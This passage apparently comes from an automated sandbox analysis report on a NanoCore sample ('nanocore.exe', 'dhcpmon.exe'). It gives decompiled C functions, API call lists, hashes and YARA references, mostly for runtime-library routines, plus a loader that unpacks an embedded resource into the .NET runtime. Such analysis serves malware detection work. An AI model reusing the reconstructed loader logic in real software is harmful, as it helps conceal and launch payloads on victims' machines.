            0x004062d8
            0x004062dd
            0x004062e2
            0x004062e5
            0x004062e7
            0x004062e7
            0x004062ec
            0x00406305
            0x0040630b
            0x00406310
            0x004063af
            0x004063b3
            0x004063b8
            0x004063b8
            0x004063cc
            0x004063d4
            0x004063d4
            0x00406316
            0x00406319
            0x0040631e
            0x00406322
            0x0040636e
            0x00406370
            0x00406372
            0x00406377
            0x0040638e
            0x00406396
            0x004063a6
            0x004063a6
            0x00406396
            0x004063a8
            0x004063a9
            0x00000000
            0x004063ae
            0x00406324
            0x00406329
            0x0040632b
            0x0040632d
            0x0040632d
            0x00406335
            0x00406352
            0x0040635c
            0x00406361
            0x00000000
            0x00000000
            0x00406363
            0x00406369
            0x00406369
            0x00000000
            0x00406369
            0x00406339
            0x0040633d
            0x00406342
            0x00406346
            0x00000000
            0x00000000
            0x00406348
            0x00000000

            APIs
            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
            • __alloca_probe_16.LIBCMT ref: 0040633D
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
            • __freea.LIBCMT ref: 004063A9
              • Part of subcall function 00403E3D: HeapAlloc.KERNEL32(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
            Memory Dump Source
            • Source File: 0000000A.00000001.662833813.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp Download File
            Yara matches
            Similarity
            • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
            • String ID:
            • API String ID: 1857427562-0
            • Opcode ID: 873a1175eb618a40616ab7a4e8bd2257b42cf29e220077db7476c7961ea7fc02
            • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
            • Opcode Fuzzy Hash: 873a1175eb618a40616ab7a4e8bd2257b42cf29e220077db7476c7961ea7fc02
            • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00405751, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
            Download Yara Rule
            C-Code - Quality: 95%
            			E00405751(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x412fc8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x40cd48 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x64572fa5
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










            0x00405756
            0x0040575a
            0x00405761
            0x00405765
            0x00405773
            0x00405789
            0x0040578d
            0x004057b6
            0x004057b8
            0x004057bc
            0x004057bf
            0x004057bf
            0x004057c5
            0x004057c7
            0x00000000
            0x004057c8
            0x0040578f
            0x00405798
            0x004057a7
            0x0040579a
            0x0040579d
            0x004057a3
            0x004057a3
            0x004057ab
            0x00000000
            0x004057ad
            0x004057b0
            0x004057b2
            0x00000000
            0x004057b2
            0x004057ab
            0x00405767
            0x0040576c
            0x00000000

            APIs
            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
            • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
            Memory Dump Source
            • Source File: 0000000A.00000001.662833813.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp Download File
            Yara matches
            Similarity
            • API ID: LibraryLoad$ErrorLast
            • String ID:
            • API String ID: 3177248105-0
            • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
            • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
            • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
            • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00404320, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
            Download Yara Rule
            C-Code - Quality: 71%
            			E00404320(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x412064; // 0xffffffff
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00403ECE(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00404192(_t25, _t31, 0x4132a4);
							E00403E03(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00403E03();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00403E8B(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x412064; // 0xffffffff
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00403ECE(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00404192(_t27, _t32, 0x4132a4);
									E00403E03(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00403E03();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00405878(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00405878(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















            0x00404320
            0x00404320
            0x00404320
            0x0040432a
            0x0040432c
            0x00404331
            0x00404334
            0x00404342
            0x00404349
            0x0040434e
            0x00404351
            0x00404354
            0x00404366
            0x0040436b
            0x0040436d
            0x00404378
            0x0040437f
            0x00404384
            0x00404387
            0x00404389
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0040436f
            0x0040436f
            0x00000000
            0x0040436f
            0x00404356
            0x00404356
            0x00404357
            0x00404357
            0x0040435c
            0x00404397
            0x00404398
            0x0040439e
            0x004043a3
            0x004043a6
            0x004043a7
            0x004043a8
            0x004043af
            0x004043b1
            0x004043b3
            0x004043b8
            0x004043bb
            0x004043c9
            0x004043d5
            0x004043d8
            0x004043db
            0x004043ed
            0x004043f2
            0x004043f4
            0x004043ff
            0x00404405
            0x0040440d
            0x0040440f
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x004043f6
            0x004043f6
            0x00000000
            0x004043f6
            0x004043dd
            0x004043dd
            0x004043de
            0x004043de
            0x00404411
            0x00404412
            0x00404412
            0x004043bd
            0x004043c3
            0x004043c7
            0x0040441a
            0x0040441b
            0x00404421
            0x00000000
            0x00000000
            0x00000000
            0x004043c7
            0x00404428
            0x00404428
            0x00404336
            0x0040433c
            0x00404340
            0x0040438b
            0x0040438c
            0x00404396
            0x00000000
            0x00000000
            0x00000000
            0x00404340

            APIs
            • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
            • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
            • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
            • _abort.LIBCMT ref: 0040439E
            Memory Dump Source
            • Source File: 0000000A.00000001.662833813.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp Download File
            Yara matches
            Similarity
            • API ID: ErrorLast$_abort
            • String ID:
            • API String ID: 88804580-0
            • Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
            • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
            • Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
            • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004025BA, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E004025BA() {
				void* _t4;
				void* _t8;

				E00402AE5();
				E00402A79();
				if(E004027D9() != 0) {
					_t4 = E0040278B(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00402815();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





            0x004025ba
            0x004025bf
            0x004025cb
            0x004025d0
            0x004025d5
            0x004025d7
            0x004025e2
            0x004025d9
            0x004025d9
            0x00000000
            0x004025d9
            0x004025cd
            0x004025cd
            0x004025cf
            0x004025cf

            APIs
            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
              • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
            Memory Dump Source
            • Source File: 0000000A.00000001.662833813.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp Download File
            Yara matches
            Similarity
            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
            • String ID:
            • API String ID: 1761009282-0
            • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
            • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
            • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
            • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00402E79, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
            Download Yara Rule
            C-Code - Quality: 87%
            			E00402E79(intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				intOrPtr* _t35;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				intOrPtr* _t43;
				intOrPtr* _t44;
				WCHAR* _t48;
				struct HINSTANCE__* _t49;
				struct HINSTANCE__* _t53;
				intOrPtr* _t56;
				struct HINSTANCE__* _t61;
				intOrPtr _t62;

				if(_a4 == 2 || _a4 == 1) {
					GetModuleFileNameW(0, 0x412bf8, 0x104);
					_t48 =  *0x412e7c; // 0x641bfc
					 *0x412e80 = 0x412bf8;
					if(_t48 == 0 ||  *_t48 == 0) {
						_t48 = 0x412bf8;
					}
					_v8 = 0;
					_v16 = 0;
					E00402F98(_t48, 0, 0,  &_v8,  &_v16);
					_t61 = E0040311E(_v8, _v16, 2);
					if(_t61 != 0) {
						E00402F98(_t48, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t49 = E00404D5E(_t61);
							if(_t49 == 0) {
								_t56 = _v12;
								_t53 = 0;
								_t35 = _t56;
								if( *_t56 == 0) {
									L15:
									_t36 = 0;
									 *0x412e6c = _t53;
									_v12 = 0;
									_t49 = 0;
									 *0x412e74 = _t56;
									L16:
									E00403E03(_t36);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t35 = _t35 + 4;
									_t53 =  &(_t53->i);
								} while ( *_t35 != 0);
								goto L15;
							}
							_t36 = _v12;
							goto L16;
						}
						 *0x412e6c = _v8 - 1;
						_t42 = _t61;
						_t61 = 0;
						 *0x412e74 = _t42;
						goto L10;
					} else {
						_t43 = E00404831();
						_push(0xc);
						_pop(0);
						 *_t43 = 0;
						L10:
						_t49 = 0;
						L17:
						E00403E03(_t61);
						return _t49;
					}
				} else {
					_t44 = E00404831();
					_t62 = 0x16;
					 *_t44 = _t62;
					E00404639();
					return _t62;
				}
			}

















            0x00402e86
            0x00402eb4
            0x00402eba
            0x00402ec0
            0x00402ec8
            0x00402ecf
            0x00402ecf
            0x00402ed4
            0x00402edb
            0x00402ee2
            0x00402ef4
            0x00402efb
            0x00402f1a
            0x00402f26
            0x00402f41
            0x00402f44
            0x00402f4b
            0x00402f51
            0x00402f58
            0x00402f5b
            0x00402f5d
            0x00402f61
            0x00402f6b
            0x00402f6b
            0x00402f6d
            0x00402f73
            0x00402f76
            0x00402f78
            0x00402f7e
            0x00402f7f
            0x00402f85
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00402f63
            0x00402f63
            0x00402f63
            0x00402f66
            0x00402f67
            0x00000000
            0x00402f63
            0x00402f53
            0x00000000
            0x00402f53
            0x00402f2c
            0x00402f31
            0x00402f33
            0x00402f35
            0x00000000
            0x00402efd
            0x00402efd
            0x00402f02
            0x00402f04
            0x00402f05
            0x00402f3a
            0x00402f3a
            0x00402f88
            0x00402f89
            0x00000000
            0x00402f92
            0x00402e8e
            0x00402e8e
            0x00402e95
            0x00402e96
            0x00402e98
            0x00000000
            0x00402e9d

            APIs
            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\nanocore.exe,00000104), ref: 00402EB4
            Strings
            Memory Dump Source
            • Source File: 0000000A.00000002.682558622.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: FileModuleName
            • String ID: C:\Users\user\Desktop\nanocore.exe$h?d
            • API String ID: 514040917-1397954633
            • Opcode ID: d65f86be848b3adfa8fae1fc2f580f18a902642f457ef4245597d21aeb7a866c
            • Instruction ID: f3d78f03607b51ffb72bb6c03706454bab976d361db7ab759f67f4c6569d847e
            • Opcode Fuzzy Hash: d65f86be848b3adfa8fae1fc2f580f18a902642f457ef4245597d21aeb7a866c
            • Instruction Fuzzy Hash: 9631C471A00219AFCB21DF99DA8899FBBBCEF84744B10407BF804A72C0D6F44E41DB98
            Uniqueness

            Uniqueness Score: -1.00%

            Analysis Process: dhcpmon.exe PID: 6152 Parent PID: 5752 dhcpmon.exeCOMMON

            Executed Functions

            Function 00401E1D, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00401E1D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
				return _t1;
			}




            0x00401e22
            0x00401e28

            APIs
            • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
            Memory Dump Source
            • Source File: 0000000B.00000001.663474041.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp Download File
            Yara matches
            Similarity
            • API ID: ExceptionFilterUnhandled
            • String ID:
            • API String ID: 3192549508-0
            • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
            • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
            • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
            • Instruction Fuzzy Hash:
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00401489, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00401489() {
				void* _v8;
				struct HRSRC__* _t4;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
				_t12 = _t4;
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}








            0x0040149f
            0x004014a5
            0x004014a9
            0x004014ec
            0x004014ee
            0x004014ee
            0x004014b7
            0x004014bb
            0x004014c7
            0x004014cd
            0x004014d3
            0x004014d8
            0x004014e0
            0x004014e0
            0x004014d8
            0x004014e6
            0x00000000

            APIs
            • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
            • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
            • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
            • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
            • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
              • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
            • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
            • ExitProcess.KERNEL32 ref: 004014EE
            Strings
            Memory Dump Source
            • Source File: 0000000B.00000001.663474041.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp Download File
            Yara matches
            Similarity
            • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
            • String ID: v4.0.30319
            • API String ID: 2372384083-3152434051
            • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
            • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
            • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
            • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0215B6C0, Relevance: 6.1, APIs: 4, Instructions: 127threadCOMMON
            Download Yara Rule
            APIs
            • GetCurrentProcess.KERNEL32 ref: 0215B730
            • GetCurrentThread.KERNEL32 ref: 0215B76D
            • GetCurrentProcess.KERNEL32 ref: 0215B7AA
            • GetCurrentThreadId.KERNEL32 ref: 0215B803
            Memory Dump Source
            • Source File: 0000000B.00000002.684406834.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
            Similarity
            • API ID: Current$ProcessThread
            • String ID:
            • API String ID: 2063062207-0
            • Opcode ID: e692ae0bdd4c986b8d3d91af3cb76973929f25aaf43c5b0784bbcf7043a53ff8
            • Instruction ID: 268ae1fd51ac6fb481eecadff834ebfa7b4accda431cd75bad4b1195fb5669cc
            • Opcode Fuzzy Hash: e692ae0bdd4c986b8d3d91af3cb76973929f25aaf43c5b0784bbcf7043a53ff8
            • Instruction Fuzzy Hash: E65158B49053488FDB10CFA9D588BDEBBF1EF48318F1484A9E419A72A0D7746944CB65
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0215B6D0, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
            Download Yara Rule
            APIs
            • GetCurrentProcess.KERNEL32 ref: 0215B730
            • GetCurrentThread.KERNEL32 ref: 0215B76D
            • GetCurrentProcess.KERNEL32 ref: 0215B7AA
            • GetCurrentThreadId.KERNEL32 ref: 0215B803
            Memory Dump Source
            • Source File: 0000000B.00000002.684406834.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
            Similarity
            • API ID: Current$ProcessThread
            • String ID:
            • API String ID: 2063062207-0
            • Opcode ID: 60eb2be3389e019c1bbada2e574530e77003bb3edacb3adb96157516c689a18f
            • Instruction ID: e66bdf36a017f0b97dfd9bc589a3c15a49100e695fa63c66fbbc0c8daa22e3fc
            • Opcode Fuzzy Hash: 60eb2be3389e019c1bbada2e574530e77003bb3edacb3adb96157516c689a18f
            • Instruction Fuzzy Hash: C85136B0A04348CFDB10CFA9D548BDEBBF1FB48318F248469E419B7260D7746944CB65
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004055C5, Relevance: 3.0, APIs: 2, Instructions: 37COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E004055C5(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E0040ACF0(_t18, _t19, _t12);
					}
					E00403E03(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}







            0x004055c5
            0x004055cf
            0x004055d3
            0x004055e4
            0x004055e8
            0x004055ed
            0x004055f3
            0x004055f8
            0x004055fd
            0x00405602
            0x00405609
            0x004055d5
            0x004055d5
            0x004055d5
            0x00405614

            APIs
            • GetEnvironmentStringsW.KERNEL32 ref: 004055C9
            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609
            Memory Dump Source
            • Source File: 0000000B.00000001.663474041.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp Download File
            Yara matches
            Similarity
            • API ID: EnvironmentStrings$Free
            • String ID:
            • API String ID: 3328510275-0
            • Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
            • Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
            • Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
            • Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD
            Uniqueness

            Uniqueness Score: -1.00%

            Function 050817E0, Relevance: 2.0, APIs: 1, Instructions: 517COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 0000000B.00000002.688412958.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1b7b9decf5631bcf28bd0315f6d699c35d4eab6da54c52496c50b6fb0b944eec
            • Instruction ID: 87ee76c02079b211f0cb800e08a5717058ec6f2d526295c2a58012ef4407392c
            • Opcode Fuzzy Hash: 1b7b9decf5631bcf28bd0315f6d699c35d4eab6da54c52496c50b6fb0b944eec
            • Instruction Fuzzy Hash: 9E226378E04206CFDB54EB94F588EBEBBB2FF89310F248555D49267365C734A882CB61
            Uniqueness

            Uniqueness Score: -1.00%

            Function 021593E8, Relevance: 1.7, APIs: 1, Instructions: 196COMMON
            Download Yara Rule
            APIs
            • GetModuleHandleW.KERNELBASE(00000000), ref: 0215962E
            Memory Dump Source
            • Source File: 0000000B.00000002.684406834.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
            Similarity
            • API ID: HandleModule
            • String ID:
            • API String ID: 4139908857-0
            • Opcode ID: fcc90d91e72559cc55da3a6bd551f39ad9957d062dfd56ba16c7407f523eaae6
            • Instruction ID: 6e015c61b2c5c2c4968b1b3d560444d5a3ec0583fc345e539dd3bb48ac74da21
            • Opcode Fuzzy Hash: fcc90d91e72559cc55da3a6bd551f39ad9957d062dfd56ba16c7407f523eaae6
            • Instruction Fuzzy Hash: 5E712570A00B15CFDB24DF29D15175ABBF2BF88204F008A6ED89AD7A50D774E846CF92
            Uniqueness

            Uniqueness Score: -1.00%

            Function 050845F5, Relevance: 1.6, APIs: 1, Instructions: 124COMMON
            Download Yara Rule
            APIs
            • CreateActCtxA.KERNEL32(?), ref: 050846B1
            Memory Dump Source
            • Source File: 0000000B.00000002.688412958.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false
            Similarity
            • API ID: Create
            • String ID:
            • API String ID: 2289755597-0
            • Opcode ID: b13df8f0a8802c3e6c459f012b30748ab6dc294a24cf62eb81cd7cb08c88cd9a
            • Instruction ID: ae7e5f297434b1443b6b87efe8a2c50378fbdff51bb7dac35bfe25f3a0cf50f7
            • Opcode Fuzzy Hash: b13df8f0a8802c3e6c459f012b30748ab6dc294a24cf62eb81cd7cb08c88cd9a
            • Instruction Fuzzy Hash: B55123B1C04659CFDB20DFA9D884BDEBBF1BF48308F20806AD448AB251D7B56946CF91
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0215FBEE, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
            Download Yara Rule
            APIs
            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0215FD0A
            Memory Dump Source
            • Source File: 0000000B.00000002.684406834.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
            Similarity
            • API ID: CreateWindow
            • String ID:
            • API String ID: 716092398-0
            • Opcode ID: 1b294f62969a8117897895bbb4678bf4050c211e0952917e1d93c5aa8db1b802
            • Instruction ID: ab4974fc6035ac69c6dd8f533eeba7f1c771d53bf43885bd210ad5200ea2a609
            • Opcode Fuzzy Hash: 1b294f62969a8117897895bbb4678bf4050c211e0952917e1d93c5aa8db1b802
            • Instruction Fuzzy Hash: E351B0B1D00219DFDB14CFA9D884ADEBBB5FF88314F24852AE819AB210D7759946CF90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0215FBF8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
            Download Yara Rule
            APIs
            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0215FD0A
            Memory Dump Source
            • Source File: 0000000B.00000002.684406834.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
            Similarity
            • API ID: CreateWindow
            • String ID:
            • API String ID: 716092398-0
            • Opcode ID: 9143125105969d768f4a031b2c70604923ecd22c3ec2b99859a5a3015be92ac5
            • Instruction ID: d12a3da2dcaeef4a9119689191024ce2497358a1eb7510eae6e5f13b07abcc3b
            • Opcode Fuzzy Hash: 9143125105969d768f4a031b2c70604923ecd22c3ec2b99859a5a3015be92ac5
            • Instruction Fuzzy Hash: 6341B0B1D00319DFDF14CFA9D884ADEBBB5BF88314F24852AE819AB210D7759945CF90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 05083474, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
            Download Yara Rule
            APIs
            • CreateActCtxA.KERNEL32(?), ref: 050846B1
            Memory Dump Source
            • Source File: 0000000B.00000002.688412958.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false
            Similarity
            • API ID: Create
            • String ID:
            • API String ID: 2289755597-0
            • Opcode ID: 9783a47ab3c9cf694ebff79ed2af6aedee881ff0fab8855a263a92373d562ffa
            • Instruction ID: 6d8b7f2f86a20e7b3249821a7e5df0aea4e0b36c41f4dc0088b660fbd9fb6c75
            • Opcode Fuzzy Hash: 9783a47ab3c9cf694ebff79ed2af6aedee881ff0fab8855a263a92373d562ffa
